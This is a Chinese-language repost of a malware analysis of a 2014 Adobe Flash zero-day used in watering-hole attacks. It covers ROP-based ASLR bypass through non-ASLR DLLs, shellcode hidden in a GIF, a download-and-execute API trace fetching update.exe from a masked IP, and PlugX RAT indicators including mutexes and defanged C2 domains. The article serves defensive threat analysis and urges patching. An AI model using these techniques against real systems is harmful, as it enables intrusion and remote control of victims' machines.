您现在的位置:首页 >> 电脑安全 >> 网络安全 >> 内容

对利用Adobe 0day – CVE

时间:2014/4/1 20:00:10 点击:

  核心提示: 前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。根据FireEye的报告,许多网站会将访问者重定向到以下包含e...
前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。 根据FireEye的报告,许多网站会将访问者重定向到以下包含exploit的恶意服务器: Peterson Institute for InternationalEconomics American Research Center in Egypt Smith Richardson Foundation恶意Flash文件位于http://4.59.XXX.XX/common/cc.swf 该Flash包含一些有趣的debug symbols: C:\Users07\Desktop\FlashExp(ie)\src\cc.asFlash文件中的ActionScript代码用来确定操作系统版本以及选择硬编码的ROP chains来绕过ASLR。  
如果是Windows XP系统,代码会先检查系统语言,对于以下两种语言的系统,则只包含ROP chains: 英文 中文在这种情况下(Windows XP系统),ROP chain使用一种众所周知的技术从msvcrt.dll中提取编译。  
  如果系统运行的是Windows 7:  - 检查系统是否安装了Java 1.6或Java 1.7。  - 如果安装了Java1.6,代码使用Java 1.6中自带的msvcr71.dll中的ROP chain,该dll文件没有ASLR保护。   - 检查系统是否安装了Microsoft Office 2007或2010  - 如果安装了,则使用Microsoft Office 2007/2010中自带的hxdl.dll中的ROP chain,该dll没有ASLR保护。 要加载hxds.dll,需要使用一种在这种类型的exploits中很常见的协议处理器location.href = 'ms-help:' ActionScript代码同时负责下载一个GIF文件:  
  下载的文件如下图所示,看起来是个正常的图片:
 
  但该图片在位于偏移3344的地方包含一个shellcode,该shellcode会从同一服务器下载并执行一个PE32文件:
 
  利用图片执行shellcode是一个聪明的做法,因为这样可以绕过很多网络安全产品的监控。 该shellcode通过利用以下函数来下载并执行PE32文件:       LoadLibraryA(wininet)     LoadLibraryA(user32)     VirtualProtect(adr=404bf1, sz=4,flags=40)     SetUnhandledExceptionFilter(0)     VirtualProtect(adr=7c81cdda, sz=82,flags=40)     VirtualProtect(adr=7c81cdda, sz=82,flags=0)     SetUnhandledExceptionFilter(7c81cdda)     GetTempPath(len=104, buf=12fca4) = 14    GetTempFileName(path=C:\users\jaime\Temp\, prefix=0, unique=0,buf=12fca4) = 245D      Path = C:\users\jaime\Temp\245d.tmp     InternetOpenA()    InternetOpenUrlA(http://4.59.XX.XX/common/update.exe)    CreateFileA(C:\users\jaime\Temp\245d.tmp) = 4     InternetReadFile(1, buf: 12fbe8, size:64)     InternetCloseHandle(1) = 1     InternetCloseHandle(1) = 1       CloseHandle(4)本次攻击中所用的payload是一个不怎么出名的远控程序PlugX RAT,我之前的博客中提到过它几次: Tracking down the author of the PlugX RAT  The connection between the Plugx Chinese gang and the latestInternet Explorer Zeroday New versions of the IExplorer ZeroDay emerge targeting Defence andIndustrial companies 恶意程序会将它自己拷贝到\AllUsers\DRM\RasTls\RasTls.exe,并在执行过程中创建以下互斥文件:   \BaseNamedObjects\Global\dklw \BaseNamedObjects\Global\cso \BaseNamedObjects\Global\qemyqvmyhiy \BaseNamedObjects\Global\eriwjjo \BaseNamedObjects\Global\etniisebehheq \BaseNamedObjects\Global\beetxado \BaseNamedObjects\Global\zhyzrjduosfptunf \BaseNamedObjects\Global\zzusnnzeqgzupeto \BaseNamedObjects\Global\onwmkwazrynpn \BaseNamedObjects\Global\nmtg \BaseNamedObjects\Global\helbibkzhruo \BaseNamedObjects\Global\opylrvflplgad \BaseNamedObjects\Global\zgjawrojchcfavnh \BaseNamedObjects\Global\gmd \BaseNamedObjects\Global\svdwr \BaseNamedObjects\Global\unbdehrrxgqujyazj \BaseNamedObjects\Global\qpl \BaseNamedObjects\Global\ihnwguwceofkhcv \BaseNamedObjects\Global\kvxieoc   \BaseNamedObjects\My_Name_horse(Svchost)同时将自身注入到svchost进程中。 PlugX包含三种不同的命令和控制方式: 00903474 -> java[.]ns1[.]name 009034B8 -> adservice[.[no-ip[.]org 009034FC -> wmi[.]ns01[.]us并通过HTTP与C&C交互:  
  注意下图中指定的C&C域名是恶意构造的:
 
至此,不用我提醒你也会尽快更新Adobe和包含漏洞、可以被用来绕过ASLR的Java和Office版本了吧。 祝玩得愉快!

 

Tags:利用 
作者:电脑维修助手 来源:不详
相关评论
发表我的评论
  • 大名:
  • 内容:
  • 电脑维修知识网(www.dnwxzs.com) © 2017 版权所有 All Rights Reserved.
  • Email:pcweixiu@tom.com 站长QQ:20567788 冀ICP备11008166号 冀公网安备 13050002001002号
  • 技术支持与报障: 电脑维修知识网